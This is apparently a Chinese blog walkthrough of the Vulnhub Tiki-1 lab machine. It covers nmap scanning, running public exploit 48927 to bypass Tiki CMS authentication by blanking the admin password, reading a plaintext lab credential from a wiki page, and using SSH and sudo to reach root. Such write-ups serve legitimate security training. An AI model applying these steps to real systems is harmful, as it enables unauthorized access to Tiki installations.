Vulnhub: Tiki-1靶机
kali:192.168.111.111
靶机:192.168.111.133
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.133
从目标网站的robots.txt文件中,发现存在目录/tiki/
访问目录发现为tiki cms
该cms存在身份验证绕过
searchsploit tiki
漏洞利用
使用exp清空admin用户密码
searchsploit -p 48927
cp /usr/share/exploitdb/exploits/php/webapps/48927.py .
python3 48927.py 192.168.111.133
登录时使用burp抓包,清空pass参数的值之后发包,即可登录
在Wiki --> List Pages --> Credentials发现账号密码:silky | Agy8Y7SPJNXQzqA
提权
使用该账号密码登录目标ssh
ssh silky@192.168.111.133
查看sudo权限
提升为root
sudo su
flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!